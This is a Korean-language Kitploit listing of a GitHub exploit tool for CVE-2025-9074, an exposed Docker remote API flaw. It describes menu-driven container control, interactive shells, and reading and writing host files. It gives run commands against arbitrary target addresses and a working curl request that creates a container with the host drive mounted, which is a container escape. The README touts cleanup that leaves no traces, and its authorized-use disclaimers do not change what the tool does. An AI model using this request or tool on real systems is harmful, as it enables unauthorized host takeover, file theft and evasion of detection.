Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-9074-Docker-Exploit — Docker 원격 API 취약점을 악용하는 강력한 도구로, CVE-2025-9074 취약점의 보안 연구 및 테스트를 위해 사용됩니다. | Kitploit
도구/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Container SecurityVulnerability AnalysisExploitationPenetration TestingCloud SecurityRed TeamingContainer Escape
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Docker 원격 API 취약점을 악용하는 강력한 도구로, CVE-2025-9074 취약점의 보안 연구 및 테스트를 위해 사용됩니다.

저장소 보기
127개월 전아직 검토되지 않음

CVE-2025-9074 Docker 컨테이너 명령 실행 도구

CVE-2025-9074 취약점의 보안 연구 및 테스트를 위한 강력한 Docker 원격 API 취약점 활용 도구입니다.

핵심 장점

✅ 완전 자동 컨테이너 수명 주기 관리: 임시 컨테이너를 자동으로 생성하고 작업 완료 후 자동으로 정리하여 흔적을 남기지 않음
✅ 스마트 경로 처리: Windows 경로를 자동으로 인식하여 Docker 마운트 형식으로 변환
✅ 완전 자동화 작업 흐름: 복잡한 명령을 수동으로 입력할 필요 없이 메뉴 방식 인터랙션으로 원클릭 파일 작업 완료
✅ 크로스 플랫폼 호환: Windows 및 Linux 시스템 완벽 지원

일부 기능 미리보기

image

기능 특징

  • 컨테이너 작업

    • 실행 중인 컨테이너 보기
    • 모든 컨테이너 보기 (중지된 컨테이너 포함)
    • 새 컨테이너 생성
    • 컨테이너 중지
    • 컨테이너 삭제
    • 단일 명령 실행
    • 대화형 터미널 (docker 라이브러리 필요)
  • 이미지 관리

    • 로컬 이미지 보기
    • 새 이미지 가져오기
    • 이미지 삭제
  • 호스트 파일 작업

    • 호스트에 파일 업로드
    • 호스트에서 파일 다운로드
    • 호스트 파일 내용 읽기
    • 호스트에 파일 쓰기
    • Windows Docker Desktop 경로 매핑 자동 처리

취약점 설명

CVE-2025-9074는 Docker 원격 API의 보안 취약점으로, 공격자는 Docker API에 무단 액세스하여 다음을 수행할 수 있습니다:

  • 임의 명령 실행
  • 컨테이너를 생성하고 호스트 디스크 마운트
  • 컨테이너 이스케이프 구현
  • 호스트 파일 읽기/쓰기

환경 요구 사항

  • Python 3.6+

종속성 설치

requirements.txt를 사용하여 모든 종속성을 설치합니다:

root@kitploit:~
pip install -r requirements.txt

또는 수동으로 설치:

root@kitploit:~
pip install requests docker websocket-client

사용 방법

기본 사용법

기본 Docker API 주소를 사용하여 스크립트를 직접 실행합니다:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

사용자 지정 Docker API 주소

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

명령줄 인자

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

기능 상세

컨테이너 작업

  1. 실행 중인 컨테이너 보기: 실행 중인 모든 컨테이너 목록 표시
  2. 모든 컨테이너 보기: 모든 컨테이너 표시 (중지된 컨테이너 포함)
  3. 새 컨테이너 생성: 지정된 이미지를 사용하여 새 컨테이너 생성
  4. 컨테이너 중지: 실행 중인 컨테이너 중지
  5. 컨테이너 삭제: 컨테이너 삭제 (강제 삭제 가능)
  6. 단일 명령 실행: 컨테이너에서 단일 명령 실행
  7. 대화형 터미널: 컨테이너의 대화형 셸 진입 (docker 라이브러리 필요)

대화형 터미널 사용

  1. 스크립트 실행 후 "1. 컨테이너 작업" 선택
  2. "1. 실행 중인 컨테이너 보기" 선택
  3. 컨테이너 번호를 입력하여 컨테이너 선택
  4. "2. 대화형 터미널 (docker 라이브러리 필요)" 선택
  5. 셸 명령 입력 (기본값: /bin/sh)
  6. 대화형 작업 시작

이미지 관리

  1. 이미지 보기: 모든 로컬 이미지 나열
  2. 이미지 가져오기: Docker Hub에서 새 이미지 가져오기
  3. 이미지 삭제: 로컬 이미지 삭제

호스트 파일 작업

호스트에 파일 업로드

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

호스트에서 파일 다운로드

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

호스트 파일 내용 읽기

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

호스트에 파일 쓰기

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Windows Docker Desktop 경로 매핑

이 도구는 Windows Docker Desktop의 경로 매핑을 자동으로 처리합니다:

Windows 경로Docker 마운트 경로

지원되는 입력 형식:

  • D:\ 또는 D:/
  • D:\temp 또는 D:/temp
  • "D:\file.txt" (따옴표 포함)
  • 'D:/file.txt' (따옴표 포함)

보안 주의 사항

⚠️ 중요 알림:

  1. 승인된 테스트에만 사용: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다
  2. 법적 준수: 사용 전에 대상 시스템의 명시적 승인을 받았는지 확인하세요
  3. 격리 환경: 격리된 테스트 환경에서 사용할 것을 권장합니다
  4. 권한 제한: Windows Docker Desktop은 C 드라이브에 쓰기 위해 관리자 권한으로 실행해야 합니다
  5. 남용 금지: 이 도구를 무단으로 사용하면 법률 및 규정을 위반할 수 있습니다

기술 원리

컨테이너 이스케이프

Docker API를 통해 컨테이너를 생성하고 호스트 디스크를 마운트합니다:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

파일 읽기/쓰기

컨테이너에서 명령을 실행하여 호스트 파일을 읽고 씁니다:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

문제 해결

컨테이너 생성 실패 (500 오류)

  • Docker API에 접근할 수 있는지 확인
  • 경로 형식이 올바른지 확인
  • 이미지가 존재하는지 확인

파일 쓰기 실패

  • Windows Docker Desktop은 관리자 권한으로 실행해야 합니다
  • 대상 디렉터리의 권한 설정 확인

대화형 터미널을 시작할 수 없음

  • docker 라이브러리가 설치되어 있는지 확인: pip install docker websocket-client
  • 터미널이 대화형 모드를 지원하는지 확인

개발 및 테스트

테스트 실행

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

코드 구조

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

기여

Issue 및 Pull Request를 환영합니다!

라이선스

이 프로젝트는 교육 및 보안 연구 목적으로만 제공됩니다.

면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 사용자는 이 도구를 사용함으로 인해 발생하는 모든 책임과 위험을 스스로 부담해야 합니다. 작성자는 이 도구의 어떠한 남용 또는 무단 사용 행위에 대해서도 책임을 지지 않습니다.

참고 자료

  • CVE-2025-9074 취약점 세부 정보
  • Docker Remote API 문서
  • Windows Docker Desktop 경로 매핑 규칙
도구 다운로드
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test